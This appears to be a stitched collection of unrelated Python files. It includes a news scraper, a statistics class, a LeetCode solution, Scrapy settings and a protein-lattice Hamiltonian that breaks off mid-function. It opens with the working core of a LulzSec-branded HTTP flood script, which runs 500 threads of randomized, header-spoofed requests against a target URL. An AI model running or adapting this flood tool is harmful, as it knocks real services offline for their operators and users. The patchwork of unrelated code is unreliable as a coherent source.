print "\a"
print \
""" .
_____|\
_.--| LOL |:
<____|.----||
.---''---,
The ;..__..' _...
Lulz ,'/ ;|/..--'' \
Boat ,'_/.-/': :
_..-'''/ / | \ \ _|/|
\ /-./_ \; \ \,;' \
,\ / \: `:\ \ // `:`.
,' \ /-._; | : : :: ,. .
,' :: /`-._| | | || ' : `.`.)
_,' |;._:: | | | | `| : `'
,' `. / |`-:_ ; | | | : \
`--. ) /|-._: : | \ \
/ / :_| ;`-._; __..--'; : :
/ ( ;|;-./_ _/.-:'o | / ' |
/ , \._/_/_./--''/_|:|___|_,' |
: / `'-'--'----'---------' |
| : O ._O O_. O ._O O_. ; ;
: `. // // // // ,' /
~~~`.______//____//____//____//_______,'~
// //~ // //
~~ _// _// _// ~ _// ~
~ / / / / / / / / ~ ~~
~~~ ~~~ ~~~ ~~~
"""
#http request
def httpcall(url):
useragent_list()
referer_list()
code=0
if url.count("?")>0:
param_joiner="&"
else:
param_joiner="?"
request = urllib2.Request(url + param_joiner + buildblock(random.randint(3,10)) + '=' + buildblock(random.randint(3,10)))
request.add_header('User-Agent', random.choice(headers_useragents))
request.add_header('Cache-Control', 'no-cache')
request.add_header('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7')
request.add_header('Referer', random.choice(headers_referers) + buildblock(random.randint(5,10)))
request.add_header('Keep-Alive', random.randint(110,120))
request.add_header('Connection', 'keep-alive')
request.add_header('Host',host)
try:
urllib2.urlopen(request)
except urllib2.HTTPError, e:
#print e.code
set_flag(1)
print '[+]~>LULZ ATTACK STARTED<~'
print '[+]~~>LULZ ATTACK STARTED<~~[+] '
code=500
except urllib2.URLError, e:
#print e.reason
sys.exit()
else:
inc_counter()
urllib2.urlopen(request)
return(code)
#http caller thread
class HTTPThread(threading.Thread):
def run(self):
try:
while flag<2:
code=httpcall(url)
if (code==800) & (safe==1):
set_flag(2)
except Exception, ex:
pass
# monitors http threads and counts requests
class MonitorThread(threading.Thread):
def run(self):
previous=request_counter
while flag==0:
if (previous+500<request_counter) & (previous<>request_counter):
print "%d lULZ Up" % (request_counter)
previous=request_counter
if flag==2:
print "\n -lULZ Finish"
#execute
if len(sys.argv) < 2:
usage()
sys.exit()
else:
if sys.argv[1]=="help":
usage()
sys.exit()
else:
print "Script Priv8 Privada da LulzSec Ghost"
if len(sys.argv)== 3:
if sys.argv[2]=="safe":
set_safe()
url = sys.argv[1]
if url.count("/")==2:
url = url + "/"
m = re.search('http\://([^/]*)/?.*', url)
host = m.group(1)
for i in range(500):
t = HTTPThread()
t.start()
t = MonitorThread()
t.start()
| 2.421875 | 2 |
extract.py | hiddeottens/shopify-scraper | 0 | 12797465 | path = './stores.csv'
import pandas as pd
from shopify import extract_products_json
with open(path) as csvfile:
    df = pd.read_csv(csvfile)
    # the 'url' column holds one store URL per row; call the extractor for
    # each URL rather than passing the whole pandas Series at once
    for url in df['url']:
        products = extract_products_json(url)
        print(products) | 2.6875 | 3 |
app/models.py | marintsev/sputniktests | 27 | 12797466 | <reponame>marintsev/sputniktests
#!/usr/bin/python
# Copyright 2009 the Sputnik authors. All rights reserved.
# This code is governed by the BSD license found in the LICENSE file.
from google.appengine.ext import db
_ESCAPEES = {
'"': '\\"',
'\\': '\\\\',
'\b': '\\b',
'\f': '\\f',
'\n': '\\n',
'\r': '\\r',
'\t': '\\t'
}
def json_escape(s):
result = []
for c in s:
escapee = _ESCAPEES.get(c, None)
if escapee:
result.append(escapee)
elif c < ' ':
result.append("\\u%.4X" % ord(c))
else:
result.append(c)
return "".join(result)
def to_json(obj):
t = type(obj)
if t is dict:
props = [ ]
for (key, value) in obj.items():
props.append('"%s":%s' % (json_escape(key), to_json(value)))
return '{%s}' % ','.join(props)
elif (t is int) or (t is long):
return str(obj)
elif (t is str) or (t is unicode):
return '"%s"' % json_escape(obj)
elif (t is list):
return '[%s]' % ','.join([to_json(o) for o in obj])
elif t is bool:
if obj: return '1'
else: return '0'
else:
return to_json(obj.to_json())
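# Editor's note (hedged usage sketch, not part of the original module):
#     to_json({'name': 'suite', 'ids': [1, 2], 'ok': True})
# is expected to yield '{"name":"suite","ids":[1,2],"ok":1}' (key order may
# vary on Python 2 dicts; booleans serialize as 1/0 per the branch above).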
class Case(db.Model):
name = db.StringProperty()
suite = db.StringProperty()
source = db.TextProperty()
serial = db.IntegerProperty()
is_negative = db.BooleanProperty()
def to_json(self):
return {'name': self.name,
'isNegative': self.is_negative,
'source': unicode(self.source)}
def to_basic_json(self):
return to_json({'name': self.name,
'isNegative': self.is_negative,
'serial': self.serial})
@staticmethod
def lookup(suite, serial):
query = Case.gql('WHERE suite = :1 AND serial = :2', suite, serial)
return query.get()
@staticmethod
def lookup_range(suite, start, end):
query = Case.gql('WHERE suite = :1 AND serial >= :2 AND serial < :3', suite, start, end)
return query.fetch(end - start)
class Suite(db.Model):
name = db.StringProperty()
count = db.IntegerProperty()
@staticmethod
def lookup(suite):
query = Suite.gql('WHERE name = :1', suite)
return query.get()
def to_json(self):
return to_json({'name': self.name, 'count': self.count})
class Version(db.Model):
current_suite = db.StringProperty()
created = db.DateTimeProperty(auto_now_add=True)
@staticmethod
def get():
query = Version.gql("ORDER BY created DESC LIMIT 1")
return query.get()
| 2.140625 | 2 |
setup.py | Mayukhdeb/taming-transformers | 0 | 12797467 | from setuptools import setup, find_packages
with open('requirements.txt') as f:
required = f.read().splitlines()
setup(
name='taming-transformers',
version='0.0.1-eden',
description='Taming Transformers for High-Resolution Image Synthesis',
packages=find_packages(),
include_package_data=True,
install_requires= required,
)
| 1.304688 | 1 |
skbio/stats/distance/_anosim.py | JWDebelius/scikit-bio | 0 | 12797468 | #! /usr/bin/env python
# ----------------------------------------------------------------------------
# Copyright (c) 2013--, scikit-bio development team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
# ----------------------------------------------------------------------------
from __future__ import absolute_import, division, print_function
import numpy as np
from scipy.stats import rankdata
from ._base import CategoricalStats
class ANOSIM(CategoricalStats):
"""ANOSIM statistical method executor.
Analysis of Similarities (ANOSIM) is a non-parametric method that tests
whether two or more groups of objects are significantly different based on
a categorical factor. The ranks of the distances in the distance matrix are
    used to calculate an R statistic, which ranges from -1 (anti-grouping)
to +1 (strong grouping), with an R value of 0 indicating random grouping.
Notes
-----
See [1]_ for the original ANOSIM reference. The general algorithm and
interface are similar to ``vegan::anosim``, available in R's vegan package
[2]_.
References
----------
.. [1] <NAME>. "Non-parametric multivariate analyses of changes in
community structure." Australian journal of ecology 18.1 (1993):
117-143.
.. [2] http://cran.r-project.org/web/packages/vegan/index.html
"""
short_method_name = 'ANOSIM'
long_method_name = 'Analysis of Similarities'
test_statistic_name = 'R statistic'
def __init__(self, distance_matrix, grouping, column=None):
super(ANOSIM, self).__init__(distance_matrix, grouping, column=column)
self._divisor = self._dm.shape[0] * ((self._dm.shape[0] - 1) / 4)
self._ranked_dists = rankdata(self._dm.condensed_form(),
method='average')
def _run(self, grouping):
"""Compute ANOSIM R statistic (between -1 and +1)."""
# Create a matrix where True means that the two objects are in the same
# group. This ufunc requires that grouping is a numeric vector (e.g.,
# it won't work with a grouping vector of strings).
grouping_matrix = np.equal.outer(grouping, grouping)
# Extract upper triangle from the grouping matrix. It is important to
# extract the values in the same order that the distances are extracted
# from the distance matrix (see self._ranked_dists). Extracting the
# upper triangle (excluding the diagonal) preserves this order.
grouping_tri = grouping_matrix[self._tri_idxs]
return self._compute_r_stat(grouping_tri)
def _compute_r_stat(self, grouping_tri):
# within
r_W = np.mean(self._ranked_dists[grouping_tri])
# between
r_B = np.mean(self._ranked_dists[np.invert(grouping_tri)])
return (r_B - r_W) / self._divisor
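# Editor's note: a hedged usage sketch, not part of the original file. It
# assumes the CategoricalStats base class in ._base makes instances callable
# with a permutations argument:
#
#     from skbio import DistanceMatrix
#     dm = DistanceMatrix([[0.0, 0.5, 1.0],
#                          [0.5, 0.0, 0.75],
#                          [1.0, 0.75, 0.0]], ['s1', 's2', 's3'])
#     results = ANOSIM(dm, grouping=['g1', 'g1', 'g2'])(permutations=99)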
| 2.609375 | 3 |
project_template/project_main_app/__init__.py | mciucu/manage-stem-app | 1 | 12797469 | <filename>project_template/project_main_app/__init__.py
default_app_config = "{{ project_main_app}}.apps.MainAppConfig"
| 1.15625 | 1 |
singlesiding/pyside.py | ewerybody/siding | 0 | 12797470 | <reponame>ewerybody/siding<gh_stars>0
"""
singlesiding supports PySide2 and 6 but needs to adapt to whats
already imported NOT whats available! Thus we deal with it here.
"""
import sys
if 'PySide6' in sys.modules:
from PySide6 import QtCore, QtWidgets, QtNetwork
elif 'PySide2' in sys.modules:
from PySide2 import QtCore, QtWidgets, QtNetwork
else:
try:
from PySide6 import QtCore, QtWidgets, QtNetwork
except ImportError:
from PySide2 import QtCore, QtWidgets, QtNetwork
| 1.492188 | 1 |
extract_table/textract_all.py | shaoyuliusz/faculty_salary | 0 | 12797471 | <gh_stars>0
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import pandas as pd
import os
import time
import glob
import sys
import textract_python_table_parser as tptp
'''
File name: textract_all.py
Author: <NAME>
Date created: 12/08/2021
Python Version: 3.9
'''
#change to the directory
#cd /Users/apple/Desktop/research_fellow_documents/process_illinois/
def get_direc(direc):
"""get the lists of all files under the directory"""
path = os.path.join(direc, direc+'png', '*png')
direc_list = glob.glob(path)
return direc_list
def main(direc):
direc_list = get_direc(direc)
for file in direc_list:
file_code = file.split('/')[-1].split('.')[0]
table_csv = tptp.get_table_csv_results(file)
direc_new = direc + 'csv'
output_file = '{}/{}/{}.csv'.format(direc, direc_new, file_code)
with open(output_file, "wt") as fout:
fout.write(table_csv)
print('output file saved: ', output_file)
if __name__ == "__main__":
direc = sys.argv[1]
main(direc)
| 2.90625 | 3 |
build/lib/abp/adaptives/a3c/__init__.py | LinearZoetrope/abp | 0 | 12797472 | <reponame>LinearZoetrope/abp<filename>build/lib/abp/adaptives/a3c/__init__.py
from .adaptive import A2CAdaptive
| 1 | 1 |
SentiNews.py | simplesaad/SentiNews | 0 | 12797473 | import requests
from bs4 import BeautifulSoup
import os  # used to check whether the output workbook already exists
import pandas as pd
from datetime import datetime
from textblob import TextBlob
page = requests.get('https://qz.com/india/latest')
soup = BeautifulSoup(page.content, 'html.parser')
weblinks = soup.find_all('article')
pagelinks = []
for link in weblinks[5:]:
url = link.contents[0].find_all('a')[0]
pagelinks.append('http://qz.com'+url.get('href'))
authorname = []
title = []
thearticle = []
for link in pagelinks:
# store the text for each article
paragraphtext = []
# get url
url = link
# get page text
page = requests.get(url)
# parse with BFS
soup = BeautifulSoup(page.text, 'html.parser')
# get author name, if there's a named author
try:
abody = soup.find(class_='d3284 india').find('a')
aname = abody.get_text()
except:
aname = 'Anonymous'
# get article title
atitle = soup.find(class_="_21349 india none _4ca8e")
thetitle = atitle.get_text()
# get main article page
articlebody = soup.find(class_='_61c55')
# get text
articletext = soup.find_all('p')[8:]
# print text
for paragraph in articletext[:-1]:
# get the text only
text = paragraph.get_text()
paragraphtext.append(text)
# combine all paragraphs into an article
thearticle.append(paragraphtext)
authorname.append(aname)
title.append(thetitle)
# join paragraphs to re-create the article
myarticle = [' '.join(article) for article in thearticle]
# create the excel file "Quartz_India" only if it does not already exist;
# recreating it on every run would wipe previously scraped articles
if not os.path.isfile("Quartz_India.xlsx"):
    df = pd.DataFrame(columns = ['Title', 'Author' , 'PageLink', 'Article', 'Date'])
    df.to_excel("Quartz_India.xlsx", index = False)
# save article data to file
data = {'Title':title,
'Author':authorname,
'PageLink':pagelinks,
'Article':myarticle,
'Date':datetime.now()}
oldnews = pd.read_excel('Quartz_India.xlsx')
news = pd.DataFrame(data=data)
cols = ['Title', 'Author', 'PageLink', 'Article', 'Date']
news = news[cols]
afronews = oldnews.append(news)
afronews.drop_duplicates(subset='Title', keep='last', inplace=True)
afronews.reset_index(inplace=True)
afronews.drop(labels='index', axis=1, inplace=True)
filename = 'Quartz_India.xlsx'
wks_name = 'Data'
writer = pd.ExcelWriter(filename)
afronews.to_excel(writer, wks_name, index=False)
writer.save()
# performing sentiment analysis on the article
data = pd.read_excel("Quartz_India.xlsx")
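# TextBlob polarity ranges from -1.0 (most negative) to +1.0 (most positive)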
data['Polarity Article'] = data.apply(lambda x: TextBlob(x['Article']).sentiment.polarity, axis=1)
data.to_excel("Sentiment_Analysis.xlsx",index = False)
| 3.296875 | 3 |
leetcode/188 best-time-to-buy-and-sell-stock-iv.py | xiewendan/algorithm | 0 | 12797474 | # -*- coding: utf-8 -*-
# __author__ = xiaobao
# __date__ = 2019/11/13 12:39:48
# desc: desc
# Given an array where the i-th element is the price of a given stock on day i,
# design an algorithm to find the maximum profit. You may complete at most k transactions.
# Note: you may not engage in multiple transactions at the same time
# (you must sell the stock before you buy again).
# Example 1:
# Input: [2,4,1], k = 2
# Output: 2
# Explanation: buy on day 1 (price = 2) and sell on day 2 (price = 4); profit = 4-2 = 2.
# Example 2:
# Input: [3,2,6,5,0,3], k = 2
# Output: 7
# Explanation: buy on day 2 (price = 2) and sell on day 3 (price = 6); profit = 6-2 = 4.
# Then buy on day 5 (price = 0) and sell on day 6 (price = 3); profit = 3-0 = 3.
# Source: LeetCode (leetcode-cn)
# Link: https://leetcode-cn.com/problems/best-time-to-buy-and-sell-stock-iv
# Copyright belongs to LeetCode; contact them for authorization before any
# commercial reprint, and cite the source for non-commercial reprints.
# Approach
# Complexity (time/space)
# Time
# Space
# Code
import sys
class Solution:
# def maxProfit(self, k: int, prices: List[int]) -> int:
def maxProfit(self, k, prices):
nLen = len(prices)
if nLen <= 1 or k == 0:
return 0
        # Case 1: k is effectively unlimited (k >= n//2, so the cap never binds)
if k >= nLen//2:
dp_i_0 = 0
dp_i_1 = -sys.maxsize
for i in range(nLen):
temp = dp_i_0
dp_i_0 = max(dp_i_0, dp_i_1 + prices[i])
dp_i_1 = max(dp_i_1, temp - prices[i])
return dp_i_0
        # Case 2: k is a finite, binding number of transactions
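        # dp_i_k_0[i][j]: max profit over the first i days with at most j
        # transactions, holding no stock; dp_i_k_1[i][j]: same, but holding
        # one share (a buy consumes one transaction).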
dp_i_k_0 = []
for i in range(nLen+1):
dp_i_k_0.append([0]*(k+1))
dp_i_k_1 = []
for i in range(nLen+1):
dp_i_k_1.append([0]*(k+1))
for j in range(k+1):
dp_i_k_1[0][j] = -sys.maxsize
for i in range(nLen+1):
dp_i_k_1[i][0] = -sys.maxsize
for i in range(1, nLen+1):
for j in range(k,0,-1):
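                # not holding: rest, or sell the held share at today's price;
                # holding: rest, or buy today using one of the j transactions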
dp_i_k_0[i][j] = max(dp_i_k_0[i-1][j], dp_i_k_1[i-1][j] + prices[i-1])
dp_i_k_1[i][j] = max(dp_i_k_1[i-1][j], dp_i_k_0[i-1][j-1] - prices[i-1])
return dp_i_k_0[nLen][k]
# Boundary / edge cases
solution = Solution()
## len(prices) <= 1
assert(solution.maxProfit(1, []) == 0)
assert(solution.maxProfit(1, [1]) == 0)
## len(prices) = 2
assert(solution.maxProfit(1, [1,4]) == 3)
assert(solution.maxProfit(2, [1,4]) == 3)
assert(solution.maxProfit(2, [4,1]) == 0)
## len(prices) = 3
assert(solution.maxProfit(1, [1,4,8]) == 7)
assert(solution.maxProfit(1, [1,8,4]) == 7)
assert(solution.maxProfit(1, [4,1,8]) == 7)
assert(solution.maxProfit(1, [4,8,1]) == 4)
assert(solution.maxProfit(1, [8,1,4]) == 3)
assert(solution.maxProfit(1, [8,4,1]) == 0)
## len(prices) >= 4
### 0 transactions
assert(solution.maxProfit(1, [7,6,4,3,1]) == 0)
### 1 transaction
assert(solution.maxProfit(1, [1,2,3,4,5]) == 4)
### 2 transactions
assert(solution.maxProfit(1, [7,1,5,3,6,4]) == 5)
assert(solution.maxProfit(2, [7,1,5,3,6,4]) == 7)
### 3 transactions
assert(solution.maxProfit(0, [7,1,5,3,6,4,7]) == 0)
assert(solution.maxProfit(1, [7,1,5,3,6,4,7]) == 6)
assert(solution.maxProfit(2, [7,1,5,3,6,4,7]) == 8)
assert(solution.maxProfit(3, [7,1,5,3,6,4,7]) == 10)
assert(solution.maxProfit(4, [7,1,5,3,6,4,7]) == 10)
assert(solution.maxProfit(5, [7,1,5,3,6,4,7]) == 10) | 3.59375 | 4 |
LogicPy/__init__.py | Sunillad08/Digital_logic | 6 | 12797475 | <filename>LogicPy/__init__.py
import LogicPy.main_functions as main_functions
import LogicPy.conversion as conversion
import LogicPy.gates as gates
import LogicPy.flipflops as flipflops
import LogicPy.combination_logic as combination_logic
import LogicPy.display_terminals as display_terminals
import LogicPy.arithematic_circuit as arithematic_circuit
import LogicPy.counters as counters
import LogicPy.shift_registers as shift_registers | 1.195313 | 1 |
Network Simulations/Assignment 1/dataGenerator.py | neeladripal/bcse-lab | 0 | 12797476 | <reponame>neeladripal/bcse-lab
import random
# generate a random binary string
def generateMessage (size):
message = ''
for count in range(size):
message += str(random.randint(0,1))
return message
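# Editor's note: an equivalent, more idiomatic one-liner would be
#     ''.join(random.choice('01') for _ in range(size))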
n = 32 * 10000 # size of data
file = open("testdata.txt", "w")
file.write(generateMessage(n))
file.close() | 3.046875 | 3 |
tags_to_sha.py | karajan1001/dvc-bench | 0 | 12797477 | <gh_stars>0
import os
from git import Repo
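# GitPython's Repo resolves each tag name in the local "dvc" checkout to its
# full commit SHA.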
def convert_to_sha(tags_filename="tags.txt", hashes_filename="hashes.txt"):
tags = []
with open(tags_filename, "r") as fobj:
tags.extend([l.strip() for l in fobj.readlines()])
git_repo = Repo("dvc")
hashes = [git_repo.commit(t).hexsha + os.linesep for t in tags]
with open(hashes_filename, "w") as fobj:
fobj.writelines(hashes)
convert_to_sha()
| 3.0625 | 3 |
pycomlink/core/__init__.py | jpolz/pycomlink | 1 | 12797478 | from __future__ import absolute_import
from .comlink_channel import ComlinkChannel
from .comlink import Comlink
| 1.0625 | 1 |
telegram_repository/utility.py | clement0010/eusoff-cca-bot | 0 | 12797479 | from spreadsheet.utility import get_user_ccas, is_registered, register_user
from telegram import InlineKeyboardButton, InlineKeyboardMarkup
from telegram.ext import ConversationHandler
import logging
logging.basicConfig(
format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO)
logger = logging.getLogger(__name__)
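# Conversation states used by telegram.ext.ConversationHandler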
CCA = 1
SECOND = 2
def start(update, context):
username = update.message.from_user.username
first_name = update.message.from_user.first_name
logger.info("User %s started the conversation.", first_name)
if is_registered(username):
ccas = get_user_ccas(username)
keyboard = [[InlineKeyboardButton(
cca, callback_data=cca)] for cca in ccas]
reply_markup = InlineKeyboardMarkup(keyboard)
update.message.reply_text("Hi %s! Please select one of your CCAs." % (
first_name), reply_markup=reply_markup)
return CCA
else:
update.message.reply_text(
'Sorry, you are not a registered user. Please contact your CCA Head to register you or /register here.')
def back(update, context):
query = update.callback_query
username = query.from_user.username
first_name = query.from_user.first_name
ccas = get_user_ccas(username)
keyboard = [[InlineKeyboardButton(
cca, callback_data=cca)] for cca in ccas]
reply_markup = InlineKeyboardMarkup(keyboard)
query.edit_message_text("Hi %s! Please select one of your CCAs." % (
first_name), reply_markup=reply_markup)
return CCA
def end(update, context):
query = update.callback_query
query.answer()
query.edit_message_text(text="Ok, see you next time!")
return ConversationHandler.END
| 2.734375 | 3 |
bglib/kvui/rootwidget.py | dheller1/bglib | 0 | 12797480 | <gh_stars>0
from kivy.uix.floatlayout import FloatLayout
class RootWidget(FloatLayout):
def __init__(self, **kwargs):
super().__init__(**kwargs)
| 2.015625 | 2 |
modules/FileManager.py | leeyongjoo/algorithm-problem-automation | 0 | 12797481 | <reponame>leeyongjoo/algorithm-problem-automation<gh_stars>0
from pathlib import Path
from modules.languages import get_extension
import os.path
from re import sub
# 상위 디렉토리 경로
BASE_DIR = Path(__file__).resolve(strict=True).parent.parent
class FileManager(object):
    default_dir = '_downloads'  # base directory for saved files
    save_cnt = 0  # number of files saved so far
def __init__(self, *dirs):
self.dirname = BASE_DIR / self.default_dir / '/'.join(*dirs)
mkdir_if_not_exists(self.dirname)
def write_file(self, name, content, language) -> bool:
basename = remove_win_special_char(name)
file = self.dirname / ''.join([basename, get_extension(language)])
if os.path.isfile(file):
# print(f'이미 존재!: {basename}')
return False
else:
with open(file, 'w', encoding='utf-8') as f:
f.write(content)
self.save_cnt += 1
return True
def get_default_dir_file_list(self):
return os.listdir(self.dirname)
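# Editor's note: on Python 3.2+ this recursive helper is roughly equivalent
# to os.makedirs(path_dir, exist_ok=True).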
def mkdir_if_not_exists(path_dir: str):
while True:
try:
if os.path.isdir(path_dir) is False:
os.mkdir(path_dir)
except FileNotFoundError:
mkdir_if_not_exists(
os.path.abspath(os.path.join(path_dir, os.pardir)))
else:
return
def remove_win_special_char(before_str):
"""
    Remove special characters that cannot be used in Windows file names.
    :param before_str: input string
    :return: the string with those special characters removed
"""
return sub('[\\\/:*?"<>|]', '', before_str)
def get_file_dirname(file_path):
return os.path.dirname(os.path.abspath(file_path)) | 2.734375 | 3 |
crawler/house_renting/settings.py | bernssolg/house-renting-master | 823 | 12797482 | <gh_stars>100-1000
# -*- coding: utf-8 -*-
from house_renting.spider_settings import lianjia, a58
BOT_NAME = 'house_renting'
COMMANDS_MODULE = 'house_renting.commands'
SPIDER_MODULES = ['house_renting.spiders']
NEWSPIDER_MODULE = 'house_renting.spiders'
USER_AGENT = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1 ' \
'Safari/605.1.15 '
USER_AGENTS = (
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; '
'.NET CLR 3.0.04506)',
'Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR '
'2.0.50727)',
'Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)',
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR '
'3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)',
'Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; '
'.NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR '
'3.0.04506.30)',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 ('
'Change: 287 c9dfb30)',
'Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1',
'Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0',
'Mozilla/5.0 (X11; Linux i686; U;) Gecko/20070322 Kazehakase/0.4.5',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 '
'Safari/535.20',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1 '
'Safari/605.1.15',
'Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52',
)
ROBOTSTXT_OBEY = False
DOWNLOAD_DELAY = 10
CONCURRENT_REQUESTS_PER_DOMAIN = 1
COOKIES_ENABLED = False
TELNETCONSOLE_ENABLED = False
DEFAULT_REQUEST_HEADERS = {
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en',
}
SPIDER_MIDDLEWARES = {
}
DOWNLOADER_MIDDLEWARES = {
'house_renting.middlewares.HouseRentingAgentMiddleware': 100,
'house_renting.middlewares.HouseRentingProxyMiddleware': 200,
'house_renting.middlewares.HouseRentingRetryMiddleware': 300,
'scrapy.downloadermiddlewares.retry.RetryMiddleware': None,
'scrapy.downloadermiddlewares.useragent.UserAgentMiddleware': None,
}
ITEM_PIPELINES = {
'house_renting.pipelines.HouseRentingPipeline': 100,
'house_renting.pipelines.DuplicatesPipeline': 200,
'scrapy.pipelines.images.ImagesPipeline': 300,
'house_renting.pipelines.ESPipeline': 400,
}
IMAGES_STORE = '/house-renting/data/images'
MEDIA_ALLOW_REDIRECTS = True
# Enable and configure the AutoThrottle extension (disabled by default)
# See http://doc.scrapy.org/en/latest/topics/autothrottle.html
AUTOTHROTTLE_ENABLED = True
# The initial download delay
AUTOTHROTTLE_START_DELAY = 10
# The maximum download delay to be set in case of high latencies
AUTOTHROTTLE_MAX_DELAY = 10
# The average number of requests Scrapy should be sending in parallel to
# each remote server
AUTOTHROTTLE_TARGET_CONCURRENCY = 2.0
# Enable showing throttling stats for every response received:
AUTOTHROTTLE_DEBUG = True
DOWNLOAD_TIMEOUT = 30
RETRY_TIMES = 3
LOG_LEVEL = 'INFO'
SPIDER_SETTINGS = {
'lianjia': {
'cities': lianjia.cities,
'available_cities': lianjia.available_cities,
'available_cities_map': lianjia.available_cities_map,
},
'58': {
'cities': a58.cities,
'available_cities': a58.available_cities,
'available_cities_map': a58.available_cities_map,
},
}
# Elasticsearch nodes; several nodes (a cluster) can be configured. Defaults to None, in which case results are not stored in ES.
ELASTIC_HOSTS = [
{'host': 'elastic', 'port': 9200},
]
REDIS_HOST = 'redis'  # defaults to None, in which case no deduplication is performed
REDIS_PORT = 6379  # defaults to 6379
| 1.53125 | 2 |
proteinham/lattice/turn_circuit.py | couteiral/proteinham | 0 | 12797483 | <filename>proteinham/lattice/turn_circuit.py
import math
import numpy as np
import sympy as sp
import symengine as se
from abc import *
from tqdm import tqdm, trange
from copy import deepcopy
from itertools import chain
from functools import reduce
from .qlogic import *
from proteinham.core.hamiltonian import Hamiltonian
class CommonTurnCircuitHamiltonian(Hamiltonian):
is_TurnCircuit = True
def __init__(self, pepstring, ss_fmat='babej'):
"""Encapsulates the expression and methods of
a protein hamiltonian of the "turn circuit encoding"
form, described by Babbush et al., 2012."""
self._proc_input(pepstring)
self.ss_fmat = ss_fmat
self.n_bits = self.dim * (self.naas-1)
self._sum_strings = dict()
self._create_bitreg()
@property
def encoding(self):
return 'turn_circuit'
def build_exp(self):
self.expr = (self.naas+1) * self.back_term()
if self.dim == 3:
self.expr += (self.naas+1)**2 * self.redun_term()
self.expr += (self.naas+1) * self.steric_term()
self.expr += self.interaction_term()
#self.expr = se.expand(self.expr)
self.n_terms = len(self.expr.args)
def get(self, k):
"""Access the kth bit of the hamiltonian."""
return self.bit_list[k]
def half_adder(self, q_i, q_j):
"""Applies a half-adder."""
return qand([q_i, q_j]), qxor(q_i, q_j)
@property
@abstractmethod
def dim(self):
pass
class TurnCircuitHamiltonian2D(CommonTurnCircuitHamiltonian):
is_2D = True
@property
def dim(self):
return 2
def pointer(self, i):
"""Points to the start of the string describing
the ith turn."""
return 2*i
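    # The two turn bits (q_i, q_j) encode directions as read off the circuits
    # below: 01 -> x+, 10 -> x-, 11 -> y+, 00 -> y-.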
def circuit_xp(self, q_i, q_j):
"""Implements a circuit that returns 1
if the chain moves in the direction x+."""
return (1-q_i)*q_j
def circuit_xn(self, q_i, q_j):
"""Implements a circuit that returns 1
if the chain moves in the direction x-."""
return q_i*(1-q_j)
def circuit_yp(self, q_i, q_j):
"""Implements a circuit that returns 1
if the chain moves in the direction y+."""
return q_i*q_j
def circuit_yn(self, q_i, q_j):
"""Implements a circuit that returns 1
if the chain moves in the direction y-."""
return (1-q_i)*(1-q_j)
def sum_string(self, i, j, k):
"""Computes the sum string."""
if i > j:
raise ValueError("i > j")
if (i, j, k) in self._sum_strings.keys():
return self._sum_strings[(i, j, k)]
if k == 'x+':
sum_string = [self.circuit_xp(self.get(self.pointer(t)),
self.get(self.pointer(t)+1))
for t in range(i, j)]
elif k == 'x-':
sum_string = [self.circuit_xn(self.get(self.pointer(t)),
self.get(self.pointer(t)+1))
for t in range(i, j)]
elif k == 'y+':
sum_string = [self.circuit_yp(self.get(self.pointer(t)),
self.get(self.pointer(t)+1))
for t in range(i, j)]
elif k == 'y-':
sum_string = [self.circuit_yn(self.get(self.pointer(t)),
self.get(self.pointer(t)+1))
for t in range(i, j)]
else:
raise ValueError('k was {:s}'.format(k))
n_layers = j-i-1
counter = np.zeros(n_layers) # lazy way to keep track of half-adders
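        # The alternating even/odd passes below form a cascade of half-adders
        # (the construction from Babbush et al., 2012) that converts the unary
        # indicator string into a binary count of moves in direction k; only
        # the ceil(log2(j-i)) low-order bits are kept.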
sum_string = list(reversed(sum_string))
for t in chain(range(n_layers),
reversed(range(n_layers-1))):
if t % 2 == 0:
iterator = range(0, t+1, 2) if t > 0 else [0]
else:
iterator = range(1, t+1, 2) if t > 1 else [1]
for h in iterator:
if self.ss_fmat == 'babej':
